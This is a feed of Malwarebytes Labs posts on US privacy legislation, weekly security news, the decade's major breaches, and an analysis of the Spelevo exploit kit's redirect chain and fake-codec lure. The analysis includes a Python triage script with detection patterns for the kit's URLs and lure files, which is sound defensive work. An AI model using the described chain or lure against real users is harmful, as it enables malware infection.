With so many bills, what’s the hold up on getting them passed?

For starters, installing comprehensive data privacy protections is long, complex work—the European Union spent more than five years drafting its own data privacy law, the General Data Protection Regulation (GDPR), and even after the EU approved the law, another two years passed before it took effect. Further, you could say that Congress is a little, um, busy as of late.

Finally, though every bill may focus on data privacy as an end goal, many disagree with how to get there.

One data privacy bill simply aims to stamp out legalese-infused end-user agreements. Another data privacy bill seeks to grant similar protections as those afforded in GDPR, like the rights to access, correct, and delete personal data. One proposal tries to stop invasive online tracking and data-sharing practices. The same proposal argues that dishonest tech CEOs should be jailed. Still more bills offer ideas like data ownership, data valuation, and something called “interoperability,” which, in a perfect world, would let individuals talk to their friends on Facebook without actually needing a Facebook account.

In combing through the many federal and state data privacy bills that emerged this year, we found some similarities. Here is a look at the legislative trends in data privacy for 2019.

Data as property

In November, one Democratic presidential hopeful latched onto a data privacy idea that has been around for at least six years: Paying people for their data.

If data is more valuable than oil, as the candidate said, then shouldn’t the people who produce that data get paid for it? Shouldn’t Americans be compensated for their most valuable asset in today’s data-driven economy?

This is the “data as property” model, and supporters of it argue that, by giving individuals the right to their own data, they can then control how their data is collected, shared, and sold. No more surprise data-sharing between one company and another. No more GPS location data falling into the hands of literal bounty hunters. (Unless, of course, that’s what you want.) And, perhaps most importantly, no more companies making it rich without consumers getting at least a little cut of the profit.

Under a “data as property” model, supporters believe that everyday consumers could receive steady, passive income by selling their data on their own terms. Not only that, but data could be sold repeatedly, as it potentially maintains its value even after being sold.

Earlier this year, US Senators Mark Warner of Virginia and Josh Hawley of Missouri hinted at this possible future with their bill, the Designing Accounting Safeguards to Help Broaden Oversight And Regulations on Data, or DASHBOARD, Act.

The DASHBOARD Act would require certain companies to assess and disclose the value of users’ data, while also extending data privacy rights to consumers to delete all, or certain fields, of collected data.

But privacy advocates argue that putting a price tag on data—a process that is neither science nor art—only normalizes the idea that our data privacy can be bought. Once that type of relationship is codified into law, the potential risks would disproportionately harm low-income, struggling communities, said Chad Marlow, senior advocacy and policy counsel at ACLU.

“If you have parents who are struggling to put food on the table—who are eating bread and drinking water for multiple dinners—and you say ‘I will give you money if you sell your data’ and you don’t even say how much, they will say yes immediately,” Marlow said. “Because they cannot afford to say no.”

This is the “pay-for-privacy” problem. It showed up a few times this year.


In November 2018, Democratic Senator Ron Wyden introduced the “Consumer Data Protection Act,” a draft proposal that would have empowered American consumers to opt-out of having their data shared with multiple third parties. Unfortunately, according to the proposal, that decision could sometimes come with a price.

As Malwarebytes Labs explained earlier this year, this is how the proposal would have worked:

“Say a user, Alice, no longer feels comfortable having companies collect, share, and sell her personal information to third parties for the purpose of targeted ads and increased corporate revenue. First, Alice would register with the Federal Trade Commission’s ‘Do Not Track’ website, where she would choose to opt-out of online tracking. Then, online companies with which Alice interacts would be required to check Alice’s ‘Do Not Track’ status.

“If a company sees that Alice has opted out of online tracking, that company is barred from sharing her information with third parties and from following her online to build and sell a profile of her Internet activity. Companies that are run almost entirely on user data—including Facebook, Amazon, Google, Uber, Fitbit, Spotify, and Tinder—would need to heed users’ individual decisions. However, those same companies could present Alice with a difficult choice: She can continue to use their services, free of online tracking, so long as she pays a price.

“This represents a literal price for privacy.”

Nearly one year after Sen. Wyden introduced this draft proposal, he formally introduced the “Mind Your Own Business Act” before the US Senate with many of the same ideas—including the same pay-for-privacy scheme.

The problems with pay-for-privacy schemes are the same with the “data as property” model—the individuals most able to assert their data privacy rights will be those who can literally afford it. If such models move forward, we risk creating a world of the “privacy-have” and “have-nots”—a mirrored image of the already visible socioeconomic striation in America.

These concerns are not hypothetical.

In 2015, AT&T offered a broadband service package with a $30-a-month discount so long as users agreed to have their Internet activity tracked. That type of browsing activity, AT&T said, included “the webpages you visit, the time you spend on each, the links and or ads you see and follow, and the search terms you enter.”

Privacy is a human right, and online privacy should be no exception. That means no commodity pricing, and no selling it to the highest bidder.

Thankfully, at least one state this year passed a law that explicitly forbids pay-for-privacy schemes.

Over the summer this year, the governor of Maine signed into law a bill that prohibits Internet Service Providers from sharing and selling Maine residents’ data without their explicit approval.

The law includes another protection that does not allow ISPs to “charge a customer a penalty or offer a customer a discount based on the customer’s decision to provide or not provide consent” to having their data sold, shared, or accessed by third parties.

Score one for data privacy.


In late October, three US Senators introduced a bill that they believed would increase data privacy by doing something else—increasing competition with Big Tech.

The idea, the Senators argued, was simple: Empower American consumers to leave the platforms that invade their online privacy without losing access to their social networks, where their friends, family, and acquaintances may still reside.

Under the proposal, Americans would enjoy the benefits of data portability—which would enable consumers to pack up their data and take it to another platform—and interoperability—a feature that would potentially allow different chat services to interact with one another. Think of it like Facebook’s massive integration plan announced earlier this year for its chat platforms Messenger, WhatsApp, and Instagram, but for nearly the entire Internet.

As we wrote before about this bill, called the ACCESS Act:

“These rules… would presumably allow Americans to, for example, download all their data from Facebook and move it to privacy-focused social network Ello. Or talk directly to Twitter users while using the San Francisco-based company’s smaller, decentralized competitor, Mastodon. Or even, perhaps, log into their Vimeo account to comment on YouTube videos.”

Responses to the bill were mixed.

Avery Gardiner, senior fellow of competition, data, and power for the Center for Democracy and Technology, lamented the lack of competition facing Big Tech, but she said that data privacy for Americans should come in a data privacy bill, not a competition bill.

Cory Doctorow, a writer, activist, and research affiliate with MIT Media Lab, welcomed the bill because, unlike other efforts in Congress, it did not focus strictly on single bad actors in Big Tech, like Facebook.

“This aims to fix the Internet,” Doctorow said, “so that Facebook’s behavior is no longer so standard.”

What’s next for 2020?

On January 1, 2020, California’s own privacy law, the California Consumer Privacy Act, takes effect. Passed in 2018, the law has survived multiple legislative attempts to weaken and defang it, and it has inspired similar legislation in other states.

With the law’s enormous scope, it will likely serve as a trial run for any federal data privacy bill.

Will companies receive serious fines, or will enforcement be lax? What will the first enforcement action be? What company will it be against? If penalties are severe, at what point will companies bandy together to prevent similar legislation from passing at the federal level? Hint: They’re already trying.

And none of this even accounts for next year’s mindshare-absorbing presidential election.

Until then—and after it—Malwarebytes Labs will closely watch this space. We can only predict it will get more interesting, more complex, and more important.

The post Online privacy in 2019: a legislative review appeared first on Malwarebytes Labs.


A week in security (December 16 – 22)

Malwarebytes - Mon, 12/23/2019 - 17:40

Last week on Malwarebytes Labs, we signalled that Mac threat detections have been on the rise in 2019, discussed how a new Consumer Online Privacy Rights Act (COPRA) would empower American users, warned that the Spelevo exploit kit debuts a new social engineering trick, and let our own Statler and Waldorf take you through a decade in cybersecurity fails: the top breaches, threats, and ‘whoopsies’ of the 2010s.

Other cybersecurity news
  • Much aligned with our own findings, Amazon’s Ring security was found to be below par, awful even. (Source:
  • A Canadian clinical laboratory services provider has suffered a data breach that exposed sensitive information and admitted to paying the hackers to retrieve the stolen data. (Source: TechSpot)
  • 22-year old Londoner Kerem Albayrak was sentenced after attempting to blackmail Apple by threatening to factory reset 319 million iCloud accounts and selling the users’ data. (Source: BleepingComputer)
  • Hackensack Meridian Health paid an undisclosed amount in ransom to stop a cyber-attack that has disrupted the hospital owner’s computer network. (Source:
  • If you stopped at a Wawa mini mart recently, your payment card details may have been snatched. (Source: TheVerge)
  • Contractor admits planting logic bombs in his software to ensure he would get new work. (Source: ArsTechnica)
  • Frankfurt, one of the largest financial hubs in the world, had to shut down its IT network following an infection with the Emotet malware. (Source: ZDNet)
  • The Maze ransomware gang started a campaign to pressure victims into paying ransom by publicly listing successful attacks and threatening to leak data. (Source: TechTarget)
  • Every minute of every day, everywhere on the planet, dozens of companies are logging the movements of millions of people with mobile phones and storing the information in gigantic data files. (Source: The New York Times)
  • A United Kingdom national appeared today in federal court on charges related to his role in a computer hacking collective known as The Dark Overlord. (Source: Department of Justice)

Stay safe, everyone!

The post A week in security (December 16 – 22) appeared first on Malwarebytes Labs.


A decade in cybersecurity fails: the top breaches, threats, and ‘whoopsies’ of the 2010s

Malwarebytes - Thu, 12/19/2019 - 18:03

This post was co-authored by Wendy Zamora and Chris Boyd. All opinions expressed belong to your mom.

Back in the days before climate change stretched frigid winter months directly into the insta-sweat of summer, there was a saying about March: in like a lamb, out like a lion. The same might be said about the last decade in cybersecurity fails.

What kicked off with a handful of stories about niche hacks ballooned into daily splashy headlines about massive data breaches, dangerous outbreaks, and increasingly sophisticated attack campaigns. The game has truly changed, generating a multi-billion-dollar industrial complex, and inspiring millions to stock up on tinfoil hats while saving trendy rumpus room designs to their Pinterest boards.

To comment on the sweeping changes brought on by the last 10 years of hacks, breaches, privacy debates, and evolutions in malware, Malwarebytes researchers Wendy Zamora and Chris Boyd take a look at the most noteworthy, mind-blowing, and sometimes chuckle-inducing cybersecurity fails that defined the decade.

2011: Game over, PlayStation

WZ: It all started with the gamers. In my mind, gaming is nearly as genre-defining as porn when it comes to testing, adopting, and embracing early tech evolutions. The two go hand-in-hand, so to speak.

I’ll just give you a minute to wipe that last image out of your head before proceeding.

Great. So, in 2011 the world got its first glimpse at the power of a good hack to not only steal data, but also bring operations to a grinding halt. The 77 million members of the Sony PlayStation Network, including minors under the age of 18, had their personal data exposed to hackers. But worse for the gamers, they were locked out of their accounts for 23 days, unable to play online, purchase, or otherwise indulge in their favorite pastime.

For the sheer number of users alone, this hack is noteworthy, but more, it was a foreshadowing of the ways in which cybersecurity fails could do more than just steal information—they could disrupt lives.

2012: Mat Honan’s digital life torched

CB: PlayStation was significant for sheer cultural impact, if not actual affected numbers, given the size of recent breaches. I usually groan when looking at yearly lists of cybersecurity fails because I know 90 percent of it is going to be the same generic breach we’ve all seen a hundred times over. Yes, it’s bad that six million customer records were swiped from a web-facing database. No, it doesn’t make for interesting reading.

Instead, I’m much more interested in specific examples of personal ruination. One such example is from 2012, when technology writer Mat Honan found his entire digital world torn in half. I’d argue this is one of the most spectacular digital demolition jobs I’ve ever seen. The crooks had no interest in him, his data, or his devices. They just wanted that sweet, sweet three-character Twitter handle. If everything important to him was torched along the way? Too bad, so sad.

This guy pretty much lost everything of real, singular importance to him in the attack. All those photos of his kid as a baby? Bam, gone. Google account taken over and deleted. iPhone and iPad data erased. Anything still on his MacBook drive was locked away behind features designed to make his life more secure, like the four-digit PIN. The worst feeling in the world isn’t just the compromise; it’s knowing that those helpful systems are a gigantic pain in the backside once someone who isn’t you is in the driving seat.

Some basic actions—enabling 2FA on Gmail and making backups—would have essentially made this a non-event. Did Honan miraculously manage to get his photographs back? Sure. It was a lucky escape, and we generally don’t get that lucky. This was one of those landmark, hot knife through buttery cybersecurity fails. I double dare you to top it.

2013: Snowed under

WZ: Sure, sure, Honan’s digital demise uncovered many holes in security processes we previously thought were failsafe, and maybe taught Apple customer service a valuable lesson in active listening. But as you yourself noted—I don’t think anyone learned anything from it. In contrast, Edward Snowden jolted the world out of its collective ostrich pose and demonstrated how very much 1984 got it right.

Depending on which side of democracy you stand on, Snowden, a former CIA contractor-turned-whistleblower, is either a hero or a war criminal for his 2013 revelations about the extent and reach of NSA-sponsored surveillance systems set up in the aftermath of 9/11. Global telecommunications systems, Internet watch lists, international cooperation, the works. In the list of cybersecurity fails, this may be the Holy Grail.

Regardless of political stance, Snowden’s reveal was a real eye-opener for the public, and it sparked a massive worldwide debate that rages on to this day. They call it “the Snowden effect.”

Just ask anyone what’s more important to them: national security or personal privacy? Do they have “nothing to hide,” or is their right to stay off the grid of utmost importance? If you can easily answer this question and guarantee everyone in the room with you agrees, then you must be reading this from far in the future, when this list will look positively quaint in comparison to yours.

2013: Cryptolocker ransomware changes the game

CB: Okay, Snowden is a double-edged sword. On the one hand, he helped confirm that those conspiracy theorists were onto something. On the other hand, he helped confirm that those conspiracy theorists were onto something. I also wonder if the significance of his findings made that much of an impact outside the US, considering lots of folks just shrugged and carried on regardless.

If you want actual global impact on a scale you can feel, ransomware is where it’s at. Cryptolocker ransomware, specifically.

Ransomware was all fun and games until Cryptolocker came onto the scene and dashed users’ hopes by being the first widespread malware to encrypt files and hold them hostage until ransom was paid. Ransomware prior to Cryptolocker mostly relied on cheap tricks instead of encryption, but its arrival in 2013 cemented this method’s popularity forever, spawning clones and higher encryption stakes by the bucketload.

2013 again: Target hack

WZ: Okay, I will totally give you Cryptolocker. Game changer, no question. But this next breach is the quintessential lesson in “it only takes one time,” the Occam’s razor of cybersecurity fails. It also happened to be the splashiest, loudest security news of the decade (so far). Why? Because everyone loves Target. Everyone.

In 2013, Target screwed up big time. Its HVAC vendor had been hit with malware via a lowly phishing email, but the technician remained dubiously unaware of that infection, which went ahead and stole Target’s network credentials. Hey, kids! What happens when you give third parties access to your VPN without thoroughly vetting them or their equipment for threats? You get hacked.

Also, note to businesses of all sizes: Free scanners do not proactively block threats. (Yes, we know, the HVAC people were using the free version of Malwarebytes.) They detect and clean malware only when you run a scan. Had the vendor been using our real-time anti-malware technology (or any other antivirus platform with always-on protection), this attack would have been erased from history.

2014: sorry, celebs! The Sony Pictures hack

CB: Everyone may love Target in the US, but on the other side of the pond, we enjoy £1 stores where everything costs, uh, £1.50. No, I don’t understand it either. What I do understand is I’m about to up the stakes to DEFCON 1 (Is that the bad one?) with a hacking tale that truly went viral. Step forward for the second time today, Sony!

The long version of the Sony Pictures hack can be read here. The short version? A hacker group called Guardians of Peace pilfered massive amounts of data from Sony servers, and in the years that have followed, it’s now tricky to remember where conspiracy theories and documented facts cross paths. A shady North Korean conspiracy, FBI and NSA involvement, multiple unreleased movies dumped online, thinly-veiled references to terrorist acts unless The Interview was pulled from theatres, and more all happened in the space of a month.

This cybersecurity fail is the equivalent of a Fast and Furious movie where the smalltime family of car heisters somehow ends up stealing nuclear footballs and taking down Russian submarines in their spare time. Also, hurling insults at someone who starred in a film called Hackers seems like a great way to invoke the Gods of dramatic irony.

2015: not sorry, cheaters

WZ: Yikes, yeah, 2014 was not a great year to be a celebrity. Just ask the victims of The Fappening. But I’m going to pivot and mention one of the decade’s cybersecurity fails that was actually a good thing: The Ashley Madison hack.

Bringing to public consciousness the term “hacktivism,” these do-gooders breached the database of the website dedicated to helping married people find true love by cheating on their partners. Some 32 million adulterers’ credentials and credit card information were dumped online, after which they were likely dumped by their angry spouses. There’s not much else I can say here except you guys are assholes and deserved this one. The end.

CB: Yeah, I got nothing. Those cheaters were bad and should feel bad.

2016: But her emails?

WZ: Look, everyone and their mother is going to say the DNC hack was the biggest cyber event of 2016. The Russians most certainly pinned the tail on the Democratic donkey, interfered in our elections, and overall made a right mess of things. There’s no doubt Russia’s actions cast a shadow over American democracy. But as far as global, far-reaching impact is concerned, I’ve got my eye on a different blight.

In 2016, a shady hacking group known as the Shadow Brokers started leaking NSA secrets, vulnerabilities, and exploits onto the Internet, embarrassing the agency, but more importantly, putting sophisticated tools in the hands of cybercriminals that would be employed over the remainder of the decade.

Most notably, they disclosed a group of SMB vulnerabilities and their accompanying exploits, which were later used to propagate the WannaCry infection laterally through thousands of endpoints, and which are still in use today to spread deadly Emotet and TrickBot infections in worm-like fashion.

If it weren’t for the cybersecurity fails caused by the Shadow Brokers, who knows? Threat actors might still be messing around with small potato consumer scams and identity theft. But with grown-up utilities in hand, they realized they could do a lot more damage to a lot more devices, and soon turned their greedy gaze to loftier goals.

2017: the year of the outbreak

CB: Well, super sneaky government tool thefts are all well and good, but the impact of ransomware retooling and running wild can’t be denied. In 2017, ransomware authors decided that just going after home users was becoming a little old hat, so they started targeting large organisations in a wave of outbreaks (fueled by the very exploits stolen from the NSA in 2016). Sadly for us, those organisations included many of the services we make use of on a daily basis, whose files and operations were encrypted and held up for Bitcoin ransom.

WannaCry, NotPetya, and BadRabbit were the big three ransomware epidemics of the year, but the malware made headlines time and time again as ransomware authors inched themselves into every available corner. Threat actors may have become a little less inventive during this period, but they certainly weren’t resting on their laurels.

Arguably the heaviest-hitting ransomware story of 2017 was the WannaCry attack on the NHS, as £92m vanished down the plughole. This was a seismic attack, the aftershocks of which are still felt today, spinning off into unexpected places that have taken on a life of their own.

2017: crypto fever

WZ: I could go with Equifax here, but come on, son. Another day, another breach. In 2017, it was safe to say that basically anyone who had ever been online had their information compromised. Which is why I will instead turn to the birth of a brand-new form of cybercrime: cryptomining.

Bitcoin and other cryptocurrency had always been the favored tender of the black market, as it’s anonymous and nearly impossible to trace. However, in 2017, crypto became more mainstream as a sudden, acute increase in value had even the beariest of bears opening cryptowallets and investing in super-niche altcoins. So naturally, cybercriminals being the vultures of the Internet, they found a way to capitalize on all this carrion by jacking the CPU/GPU of other users’ systems to generate coin.

Starting in late 2017, we started noticing hundreds of millions of detections of, a CPU-mining platform that—while itself was a legitimate service—was being abused by cybercriminals to mine users without their permission. This kicked off a landslide of cryptomining activity that spawned the creation of multi-platform cryptomining malware, drive-by mining attacks, crypto-bundlers, crypto-themed scams, cryptowallet drainers, crypto crypto cryptors, and crypto.

While cryptomining has since died down from its 2017-2018 heyday, it remains forever part of the threat landscape, and I’m sure we’ll be seeing much more of it as cryptocurrency and blockchain technology take hold in the next decade.

2018: shine’s off social media

CB: 2018 was all about the covert use of data pulling the strings in every direction you can imagine. Data mining and digital assets plus social media makes for a cracking combination in the wrong hands, and it turns out Facebook was the place most of this war was fought and won (or lost, if you were on the receiving end).

Cambridge Analytica, a political consulting firm based in the UK, probably knew they’d walked into “oh, whoops” territory when their offices were raided in 2018. They’d been mucking around on multiple elections worldwide, but drew attention to themselves and Facebook after it was discovered that they’d been harvesting the personal information from 50 million Facebook user profiles without their permission. The repercussions from this story continue to be felt today, as lawmakers now scrutinize Big Tech for their data privacy policies.

2018: data privacy becomes a thing

WZ: Actually, I have to semi-agree on Cambridge Analytica. But I see your social media problems and I raise you an entire Internet of data privacy issues. In 2018, users got a rude awakening into the inner workings of the tech giants they’d come to love, rely on, and otherwise be addicted to. Wait, you’re selling my information to pharmaceutical companies? You can actually record my conversations through my digital home assistant? Suddenly, users had to be just as wary of legitimate tech companies as they were of cybercriminals.

The awareness of 2018 led to global action, as GDPR was put into effect, launching a million cookie notices and EULA rewrites. Digital data privacy had always been an issue, reaching far back to pre-Y2K years, and it will continue for many decades as we contend with biometrics and genetic data. But 2018 represented a period of public “wokeness” that forever changed the way we build, buy, regulate, and use technology.

2019: the year of the triple threat

CB: We’re too close to 2019 to be able to say conclusively what stuck and what stank, but the triple threat of Emotet, TrickBot, and Ryuk ransomware caused such massive problems across a range of critical infrastructure and business services that any 2019 listicle that doesn’t feature this attack is missing the mark. If your mailbox hasn’t detected the familiar twang of an Emotet malspam landing on the network yet, you’re doing very well indeed.

The triple threat officially saw light in 2018, but it was the attack of 2019. If there was news of a city declaring a state of emergency, a school shutting down for weeks, or a hospital shelling out thousands in ransom payment, you bet it was on account of these three devils. It’s an assault from every angle, and in an alien invasion, this would be the part where the hero escaped through a conveniently placed air vent.

Cybersecurity fail of the decade

All this arguing on which cybersecurity fails were most awe-inspiring, death-defying, or just plain stupid would be pointless if we didn’t wrap it up in a nice year-end bow. So, without further ado, we’ll now take our pick of the top cybersecurity fail of the decade. Drumroll please…

WZ: My vote is for Shadow Brokers because it set off a chain of events that allowed for cybercriminals to evolve into more sophisticated, industrialized players, essentially radically changing the threat landscape from a bunch of kids messing around in their basements to organized criminals aimed at taking down organizations, swiping millions of users’ personal data and making significant profit in the process.

CB: My pick is the Mat Honan hack. It’s not as big, or as flashy, or as sophisticated as most of the attacks on display. But what happened to him pretty much still happens to people now as their first introduction to the world of “All my data is gone forever.” How they torched his digital existence and salted the earth is beyond brutal—and, most chillingly, it was nothing personal.

Which of these cybersecurity fails would you vote for? Sound off in the comments!

The post A decade in cybersecurity fails: the top breaches, threats, and ‘whoopsies’ of the 2010s appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Spelevo exploit kit debuts new social engineering trick

Malwarebytes - Wed, 12/18/2019 - 16:00

2019 has been a busy year for exploit kits, despite the fact that they haven’t been considered a potent threat vector for years, especially on the consumer side. This time, we discovered the Spelevo exploit kit with its virtual pants down, attempting to capitalize on the popularity of adult websites to compromise more devices.

The current Chromium-dominated browser market share favors social engineering attacks and other threats that do not require the use of exploits in order to infect users. However, we continue to see malvertising campaigns pushing drive-by downloads in our telemetry. The malicious adverts are placed on tier 2 adult websites that still drive a lot of traffic.

Recently, we captured an unusual change with the Spelevo exploit kit where, after an attempt to trigger vulnerabilities in Internet Explorer and Flash Player, users were immediately redirected to a decoy adult site.

Figure 1: Exploit kit used in tandem with social engineering

Spelevo EK instructs the browser to load this site, which social engineers victims into installing a video codec in order to play a movie. This appears to be an effort from the Spelevo EK operator to double his chances of compromising new machines.

Spelevo EK changes its redirection URL

Based on our telemetry, there are a few campaigns run by threat actors converting traffic to adult sites into malware loads. In one campaign, we saw a malvertising attack on a site that draws close to 50 million visitors a month.

Figure 2: Traffic view from EK to social engineering site

We collected two main payloads coming directly from Spelevo EK:

  • Ursnif/Gozi
  • Qbot/Qakbot

One thing that Spelevo EK does a little differently from other exploit kits is redirect victims after the exploitation attempt, typically following a 10-second delay:

Figure 3: Google redirect with 10 second delay

However, in this latest capture, we noticed that the script had been edited and that the time was increased to 60 seconds:

Figure 4: Google redirect with 60 second delay

This change is important because it allows enough time for the exploit kit to run all the way through and call the last URL that is part of the EK framework. Here, we noticed something new as well.

Previously, the URL immediately following the payload had the following ending pattern: &00000111&11. Now, the new pattern is 32 characters followed by the letter ‘n’.

Figure 5: Redirection from EK to decoy adult site

Before the refresh tag comes into effect, the browser is redirected to a new location, which happens to be a decoy adult site.

Social engineering as backup

There is nothing special about this fake adult site, but it works really well in the context of the malvertising chain. Victims were already engaged with the content and may not even realize that an exploitation attempt just happened.

Figure 6: Fake adult site tricking users with fake video codec

This time around, the site urges users to download a file called lookatmyplayer_codec.exe. Downloading video codecs to view media used to be fairly common back in the day, but isn’t really the case anymore. Yet, this kind of trick still works quite well and is an alternative method to compromise users.

The fake codec turns out to be Qbot/Qakbot, which is also one of the payloads distributed by Spelevo EK. In other words, the threat actor has two chances to infect victims: either via the exploit kit or fake codec.
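The chain described above (a timed meta refresh on the landing page, a final EK URL whose tail pattern changed from &00000111&11 to 32 characters followed by "n", and a fake codec executable served by the decoy site) can be triaged from a captured page and a list of fetched URLs. The following script is an added example written for this post, not code from Malwarebytes; the domains and log entries are constructed, and it assumes the 32-character tail is alphanumeric, which the post does not state.

```python
"""Triage helpers for the Spelevo EK redirect chain (added example)."""
import re
from html.parser import HTMLParser

# URL tails described in the post: the old "&00000111&11" ending and the
# new "32 characters followed by n". ASSUMPTION: those 32 characters are
# alphanumeric; the post does not specify the character set.
OLD_TAIL = re.compile(r"&00000111&11$")
NEW_TAIL = re.compile(r"(?<![A-Za-z0-9])[A-Za-z0-9]{32}n$")

# Fake-codec lure: an executable whose file name claims to be a video codec
# (the post names lookatmyplayer_codec.exe).
CODEC_LURE = re.compile(r"codec[^/]*\.exe$", re.I)


class RefreshExtractor(HTMLParser):
    """Collect (delay_seconds, target_url) from <meta http-equiv="refresh"> tags."""

    def __init__(self):
        super().__init__()
        self.refreshes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "meta":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("http-equiv", "").lower() != "refresh":
            return
        # content looks like "60;url=https://..." (delay, then target URL)
        m = re.match(r"\s*(\d+)\s*;\s*url\s*=\s*['\"]?([^'\"\s]+)",
                     a.get("content", ""), re.I)
        if m:
            self.refreshes.append((int(m.group(1)), m.group(2)))


def extract_refresh(html):
    """Return every timed refresh found in a captured landing page."""
    parser = RefreshExtractor()
    parser.feed(html)
    return parser.refreshes


def classify_url(url):
    """Label a fetched URL by the patterns the post describes, or None."""
    if OLD_TAIL.search(url):
        return "spelevo-old-tail"
    if NEW_TAIL.search(url):
        return "spelevo-new-tail"
    if CODEC_LURE.search(url.split("?")[0]):
        return "fake-codec-download"
    return None


def triage(landing_html, url_log):
    """Combine refresh timing and URL labels into a list of findings.

    Each finding is (label, delay_seconds_or_None, url).
    """
    findings = []
    for delay, target in extract_refresh(landing_html):
        findings.append(("meta-refresh", delay, target))
    for url in url_log:
        label = classify_url(url)
        if label:
            findings.append((label, None, url))
    return findings


# Constructed sample, not a real capture: a 60-second refresh to Google, an EK
# URL with the new 32-char + "n" tail, a decoy site page, the fake codec
# download, and an EK URL with the old tail. Domains are hypothetical.
SAMPLE_HTML = ('<html><head><meta http-equiv="refresh" '
               'content="60;url=https://www.google.com/"></head>'
               '<body></body></html>')
SAMPLE_LOG = [
    "http://ek.example/landing?id=abc",
    "http://ek.example/" + "a" * 32 + "n",
    "http://decoy.example/watch.php",
    "http://decoy.example/lookatmyplayer_codec.exe",
    "http://ek.example/old?x=1&00000111&11",
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_HTML, SAMPLE_LOG):
        print(finding)
```

Run against a saved landing page and the ordered URLs from a proxy log, the output shows whether the refresh delay matches the 10-second or 60-second variant, which final EK URL tail is in use, and whether a codec-named executable was fetched from the decoy site afterwards.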

This is not the first time that exploit kit operators have included social engineering schemes. In 2017, Magnitude EK was seen pushing a fake Windows Defender notification, while Disdain EK was tricking users with a fake Flash Player update.

Malwarebytes users are protected against both the exploit kit and payloads.

Indicators of compromise (IOCs)

Decoy adult site

The post Spelevo exploit kit debuts new social engineering trick appeared first on Malwarebytes Labs.
